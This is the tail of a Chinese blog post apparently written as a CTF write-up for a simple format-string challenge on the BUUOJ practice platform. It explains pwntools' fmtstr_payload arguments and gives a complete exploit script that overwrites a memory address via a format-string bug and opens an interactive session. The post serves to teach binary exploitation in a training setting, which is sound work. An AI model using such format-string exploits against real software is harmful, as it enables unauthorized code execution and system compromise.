<p><img src="https://i.loli.net/2021/02/10/I12aOjkyhDSxKlA.png" alt="27.png"></p>
<p>偏移量为10</p>
<p>如果是常规的payload构造是不是还要考虑填充字符串的长度啊</p>
<p>但是如果我们用fmtstr_payload()就万事大吉一步到位</p>
<p>fmtstr_payload(offset, writes, numbwritten=0, write_size=’byte’) </p>
<p>第一个参数表示格式化字符串的偏移；</p>
<p> 第二个参数表示需要利用%n写入的数据，采用字典形式，我们要将printf的GOT数据改为system函数地址，就写成{printfGOT: systemAddress}；</p>
<p>第三个参数表示已经输出的字符个数，这里没有，为0，采用默认值即可；</p>
<p> 第四个参数表示写入方式，是按字节（byte）、按双字节（short）还是按四字节（int），对应着hhn、hn和n，默认值是byte，即按hhn写。 fmtstr_payload函数返回的就是payload</p>
<p>实际上我们常用的形式是fmtstr_payload(offset,{address1:value1})</p>
<p>例如本题payload</p>
<p>payload=fmtstr_payload(10,{0x0804C044:0x10})</p>
<p>上完整exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">r=remote(<span class="string">&quot;node3.buuoj.cn&quot;</span>,<span class="number">25369</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#r=process(&#x27;./no&#x27;)</span></span><br><span class="line"></span><br><span class="line">r.recvuntil(<span class="string">&quot;your name:&quot;</span>)</span><br><span class="line"></span><br><span class="line">payload=fmtstr_payload(<span class="number">10</span>,&#123;<span class="number">0x0804C044</span>:<span class="number">0x10</span>&#125;)</span><br><span class="line"></span><br><span class="line">r.sendline(payload)</span><br><span class="line"></span><br><span class="line">r.recvuntil(<span class="string">&quot;your passwd:&quot;</span>)</span><br><span class="line"></span><br><span class="line">r.sendline(<span class="built_in">str</span>(<span class="number">0x10</span>))</span><br><span class="line"></span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>
<p><img src="https://i.loli.net/2021/02/10/528lHjhuTqpkNWi.png" alt="28.png"></p>
<p>这个万金油函数不管覆盖大小数的格式化字符串题型都可以写</p>
<p>今天BB了好多，自己感悟更多了希望来看的人也有所感悟</p>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/diazang/2021/01/30/Overflow1/" rel="prev" title="stackoverflow1">
      <i class="fa fa-chevron-left"></i> stackoverflow1
    </a></div>
      <div class="post-nav-item">
    <a href="/diazang/2021/02/10/canary%E5%85%A5%E9%97%A8/" rel="next" title="canary入门（格式化字符串混搭栈溢出）">
      canary入门（格式化字符串混搭栈溢出） <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    <div class="comments" id="valine-comments"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%AE%80%E5%8D%95%E6%A0%88%E6%BA%A2%E5%87%BA%E5%92%8C%E7%AE%80%E5%8D%95%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E4%BE%8B%E9%A2%98"><span class="nav-number">1.</span> <span class="nav-text">简单栈溢出和简单格式化字符串例题</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%90%8E%E9%97%A8%E7%B1%BB%E6%97%A0%E9%98%B2%E6%8A%A4%E5%A4%BA%E6%9D%83"><span class="nav-number">1.1.</span> <span class="nav-text">后门类无防护夺权</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%9B%BF%E6%8D%A2%E7%B1%BB%E6%A0%88%E6%BA%A2%E5%87%BA"><span class="nav-number">1.2.</span> <span class="nav-text">字符串替换类栈溢出</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%99%9A%E5%81%87%E5%90%8E%E9%97%A8%E7%B1%BB"><span class="nav-number">1.3.</span> <span class="nav-text">虚假后门类</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%95%B0%E5%AD%97%E8%A6%86%E7%9B%96%E7%B1%BB%E6%A0%88%E6%BA%A2%E5%87%BA"><span class="nav-number">1.4.</span> <span class="nav-text">数字覆盖类栈溢出</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%BB%95%E8%BF%87%E5%AD%97%E7%AC%A6%E5%A4%A7%E5%B0%8F%E6%9D%A1%E4%BB%B6%E9%99%90%E5%88%B6%E7%B1%BB%E6%A0%88%E6%BA%A2%E5%87%BA"><span class="nav-number">1.5.</span> <span class="nav-text">绕过字符大小条件限制类栈溢出</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%9C%80%E7%AE%80%E5%8D%95%E7%9A%84%E4%B8%80%E9%81%93%E9%A2%98"><span class="nav-number">1.6.</span> <span class="nav-text">格式化字符串最简单的一道题</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%AE%80%E5%8D%95%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E9%A2%98%E7%9B%AE"><span class="nav-number">1.7.</span> <span class="nav-text">简单格式化字符串题目</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A4%A7%E6%95%B0%E8%A6%86%E7%9B%96%E7%B1%BB"><span class="nav-number">1.7.1.</span> <span class="nav-text">大数覆盖类</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%B0%8F%E6%95%B0%E8%A6%86%E7%9B%96"><span class="nav-number">1.7.2.</span> <span class="nav-text">小数覆盖</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%B8%87%E9%87%91%E6%B2%B9%E7%AE%80%E5%8D%95%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2"><span class="nav-number">1.7.3.</span> <span class="nav-text">万金油简单格式化字符串</span></a></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="H.R.P"
      src="https://www.hualigs.cn/image/6015786be4309.jpg">
  <p class="site-author-name" itemprop="name">H.R.P</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/diazang/archives/">
        
          <span class="site-state-item-count">38</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
  </nav>
</div>



      </div>
        <div class="back-to-top motion-element">
          <i class="fa fa-arrow-up"></i>
          <span>0%</span>
        </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        <!-- 用下面的符号注释，注释代码用下面括号括起来 -->
<!-- -->

<!-- 







-->


        








      </div>
    </footer>
  </div>

  
  <script src="/diazang/lib/anime.min.js"></script>
  <script src="/diazang/lib/velocity/velocity.min.js"></script>
  <script src="/diazang/lib/velocity/velocity.ui.min.js"></script>

<script src="/diazang/js/utils.js"></script>

<script src="/diazang/js/motion.js"></script>


<script src="/diazang/js/schemes/pisces.js"></script>


<script src="/diazang/js/next-boot.js"></script>




  




  
<script src="/diazang/js/local-search.js"></script>













  

  


<script>
NexT.utils.loadComments(document.querySelector('#valine-comments'), () => {
  NexT.utils.getScript('//unpkg.com/valine/dist/Valine.min.js', () => {
    var GUEST = ['nick', 'mail', 'link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(item => {
      return GUEST.includes(item);
    });
    new Valine({
      el         : '#valine-comments',
      verify     : false,
      notify     : false,
      appId      : 'g8R6OK66Q2xJiQieSaxzFqVA-gzGzoHsz',
      appKey     : 'V9mmkUCmucvukcz6LwkONqXa',
      placeholder: "Just go go",
      avatar     : 'mm',
      meta       : guest,
      pageSize   : '10' || 10,
      visitor    : false,
      lang       : '' || 'zh-cn',
      path       : location.pathname,
      recordIP   : false,
      serverURLs : ''
    });
  }, window.Valine);
});
</script>

</body>
</html>
<a href="http://jue-xian.gitee.io/diazang"><svg width="80" height="80" viewBox="0 0 250 250" style="fill:#70B7FD; color:#fff; position: absolute; top: 0; border: 0; right: 0;" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></a><style>.github-corner:hover .octo-arm{animation:octocat-wave 560ms ease-in-out}@keyframes octocat-wave{0%,100%{transform:rotate(0)}20%,60%{transform:rotate(-25deg)}40%,80%{transform:rotate(10deg)}}@media (max-width:500px){.github-corner:hover .octo-arm{animation:none}.github-corner .octo-arm{animation:octocat-wave 560ms ease-in-out}}</style>
<!-- 动态背景 -->
<script type="text/javascript" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>
<!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/src/clicklove.js"></script>


